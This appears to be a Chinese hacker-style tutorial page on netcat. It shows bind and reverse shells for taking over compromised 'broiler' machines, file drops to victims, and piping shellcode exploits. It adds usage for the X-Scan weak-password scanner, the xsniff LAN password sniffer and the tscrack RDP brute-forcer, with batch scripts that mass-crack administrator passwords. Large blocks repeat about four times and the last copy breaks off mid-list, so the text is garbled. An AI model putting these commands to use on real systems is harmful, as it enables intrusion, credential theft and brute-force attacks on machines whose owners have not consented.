導航:首頁 > 使用方法 > nc使用方法

nc使用方法

發布時間:2022-01-07 05:43:58

1. NC怎麼用啊

NC使用教程

使用動畫可以提供給核心成員,菜鳥們也可向我索取

在黑客界混如果不知道什麼叫NC的話,那可真是白混了

今天教大家如何來使用NC

講四個命令

命令1:監聽命令

nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port

參數解釋:

-l:監聽埠,監聽入站信息
-p:後跟本地埠號
-v:顯示埠的信息,如果使用-vv的話,則會顯示埠更詳細的信息

提示:一般大家都愛用-vv

nc -l -p 80

這個很簡單,監聽80埠
如果機器上運行這個命令,埠80被認為是開放的,可以欺騙很多掃描器的哦!

nc -l -p 80 > e:\log.dat

呵呵,功能和上邊一樣,但是後邊加了個「> e:\log.dat」我想,學過ECHO
那個命令的人都會知道吧,是在E盤創建一個log.dat的日誌文件

nc -l -v -p 80

和上邊命令相似,不過這次不是記錄在文件里,而是會直接顯示在運行著NC
的屏幕上。

呵呵,講了這么多,來實踐下

nc -l -v -p 80

然後在瀏覽器中輸入本機IP:127.0.0.1
呵呵,看到什麼?

同樣,上邊兩個也是一樣,大家自己試驗一下吧

命令2:程序定向

nc -l -p port -t -e cmd.exe

本地機: nc -l -p port 或 nc -l -v -p port

目標機:nc -e cmd.exe ip port

參數解釋:

-l、-p兩個參數已經解釋過了

-e;作用就是程序定向
-t:以telnet的形式來應答

例子

nc -l -p 5277 -t -e cmd.exe

知道運行在哪裡嗎?千萬不要運行在自己的機器上,如果運行了,你機器
就會變成一台TELNET的伺服器了,呵呵,解釋一下:監聽本地埠5277的
入站信息,同時將CMD.exe這個程序,重定向到埠5277上,當有人連接的時候,就讓程序CMD.exe以TELNET的形式來響應連接要求。

說白了,其實就是讓他成為一台TELNET的肉雞,所以這個命令要運行在你的肉雞上。。(話外音:說這么多遍當我們白痴啊,快往下講!!!)

呵呵,咱們來找台肉雞試試,我TELNET IP 5277
HOHO~~如何?

local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port

大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈埠型的木馬,
什麼叫反彈埠?就是說,當對方中馬後,不用你主動和對方連接,也就是說
不用從你的client端向對方主機上運行的server端發送請求連接,而是對方主動來連接你
這樣就可以使很多防火牆失效,因為很多防火牆都不檢查出站請求的。

這里這兩個命令結合在一起後,於那兩款木馬可以說有異曲同工之效。為什麼?
咳!!聽我給你講啊!!(先交100000000RMB學費)哇,別殺我啊!!)

nc -l -p 5277 (堅聽本地5277埠)

同樣也可以用

nc -l -v -p 5277

運行在本地

然後在遠程機器上,想辦法運行

nc -e cmd.exe ip 5277

(你可別真的打「ip」在肉機上啊)要打,xxx.xxx.xxx.xxx這樣!!

呵呵,看看在本地機器上出現了什麼?

這樣就是反彈~~在本地機器上得到了一個SHELL

命令3:掃描埠

nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port

參數解釋:

-z:將輸入輸出關掉,在掃描時使用

nc -v ip port

這個命令是針對某一個埠進行掃描

例如:

nc -v ip 135

掃描遠程主機的135埠,這樣獲得了該埠的一些簡單信息,但是針對某些埠,我們還可以獲得更多的信息

例如:80埠

我們可以使用nc -v ip 80 然後使用get方法來獲得對方的WEB伺服器的信息

nc -v -z ip port-port

這個命令是用來掃描的一個命令,這個命令用於快速掃描TCP埠,而port-port則是指定了掃描的埠范圍

例如:

nc -v -z ip 1-200

可以看到我機器上的1-200的TCP埠的開放情況

nc -v -z -u ip port-port

這個命令比上個命令多了個-u,這個命令的作用仍然是掃描埠,只是多了一個-u的參數,是用來掃UDP埠的

例如:

nc -v -z -u ip 1-200

這個命令就會掃1-200的UDP埠

命令4:傳送文件(HOHO,I LIKE)

LOCAL MACHINE:nc -v -n ip port < x:\svr.exe
REMOTE MACHINE:nc -v -l -p port > y:\svr.exe

參數解釋:

-n:指定數字的IP地址

這兩個命令結合起來是用來傳送文件的

首先,在遠程機上運行命令:

nc -v -l -p 5277 > c:\pulist.exe

這個命令還記的嗎?呵呵,是不是和監聽命令有點類似,對,沒錯,這個是監聽5277埠

並把接受到的信息數據寫到c:\pulist.exe中

這時候在本地機上運行

nc -v -n ip 5277 < e:\hack\pulist.exe

這個命令的意思就是,從本地E盤跟目錄中讀取pulist.exe文件的內容,並把這些數據發送到ip的5277埠上

這樣遠程主機就會自動創建一個pulist.exe文件。。呵呵,你想到了嗎??

上邊是NC的比較常用的方法,希望通過這些,大家能發揮自己的想像力,創造出更多更精彩的命令來,
因為NC的用法不僅僅局限於這幾種而已哦!!對NC來說,只有想不到,沒有做不到的!!!

2. nc使用方法

nc.exe -h即可看到各參數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]

-d 後台模式
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-L 連接關閉後,仍然繼續監聽
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地埠號
-r 隨機本地及遠程埠
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉--用於掃描時

埠的表示方法可寫為M-N的范圍格式。

基本用法:

大概有以下幾種用法:

1)連接到REMOTE主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80埠

2)監聽LOCAL主機,例子:
格式:nc -l -p 80
講解:監聽本機的TCP80埠

3)掃描遠程主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有埠

4)REMOTE主機綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354埠

5)REMOTE主機綁定SHELL並反向連接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354埠

以上為最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令「|」與重定向命令「<」、「>」等等命令功能更強大......)。

高級用法:

6)作攻擊程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連接到192.168.x.x的80埠,並在其管道中發送c:exploit.txt的內容(兩種格式確有相同的效果,
真是有異曲同工之妙:P)

附:c:exploit.txt為shellcode等

7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用-L(注意L是大寫)可以不停地監聽某一個埠,直到ctrl+c為止

8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:log.txt
講解:使用-L可以不停地監聽某一個埠,直到ctrl+c為止,同時把結果輸出到c:log.txt中,如果把『>』
改為『>>』即可以追加日誌

附:c:log.txt為日誌等

9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:honeypot.txt
格式2:type.exe c:honeypot.txt|nc -L -p 80
講解:使用-L可以不停地監聽某一個埠,直到ctrl+c為止,並把c:honeypot.txt的內容『送』入其
管道中

3. nc.exe使用方法

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」

文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同

一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在

pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和

udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破

主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸

192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主

機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的
administrator密碼,並將破解結果保存在rouji.txt文件中。
本人比較懶汗,那麼多呢!~不去記了整理出來HOHO大家也能用著,嘎嘎~

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」

文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同

一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在

pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和

udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破

主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸

192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主

機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的
administrator密碼,並將破解結果保存在rouji.txt文件中。
本人比較懶汗,那麼多呢!~不去記了整理出來HOHO大家也能用著,嘎嘎~

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默
認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測

192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測

192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大

並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」

文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同

一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址 過濾IP地址
-port 埠 過濾埠
-log 文件名 將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出

用法示例
xsniff.exe -pass -hide -log pass.log 後台運行嗅探密碼並將密碼信息保存在

pass.log文件中
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1並過濾tcp和

udp信息並以ASCII格式輸出

4、終端服務密碼破解: tscrack.exe

參數說明
-h 顯示使用幫助
-v 顯示版本信息
-s 在屏幕上打出解密能力
-b 密碼錯誤時發出的聲音
-t 同是發出多個連接(多線程)
-N Prevent System Log entries on targeted server
-U 卸載移除tscrack組件
-f 使用-f後面的密碼
-F 間隔時間(頻率)
-l 使用-l後面的用戶名
-w 使用-w後面的密碼字典
-p 使用-p後面的密碼
-D 登錄主頁面
用法示例
tscrack 192.168.0.1 -l administrator -w pass.dic 遠程用密碼字典文件暴破

主機的administrator的登陸密碼
tscrack 192.168.0.1 -l administrator -p 123456 用密碼123456遠程登陸

192.168.0.1的administrator用戶
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
nscan
@echo 3389.txt no find or scan faild
(①存為3389.bat) (假設現有用SuperScan或其它掃錨器掃到一批開有3389的主

機IP列表文件3389.txt)
3389.bat意思是:從3389.txt文件中取一個IP,接著運行hack.bat
@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存為hack.bat) (運行3389.bat就OK,且3389.bat、hack.bat、3389.txt、
pass.dic與tscrack.exe在同一個目錄下;就可以等待結果了)
hack.bat意思是:運行tscrack.exe用字典暴破3389.txt中所有主機的
administrator密碼,並將破解結果保存在rouji.txt文件中。
本人比較懶汗,那麼多呢!~不去記了整理出來HOHO大家也能用著,嘎嘎~

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在

remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的

cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到

CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,

直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80端

口,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆

本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件
到對方主機

備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容
賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt

>> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別
執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果
,是因為第二次的結果把第一次的覆蓋了。

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止

IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件

名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
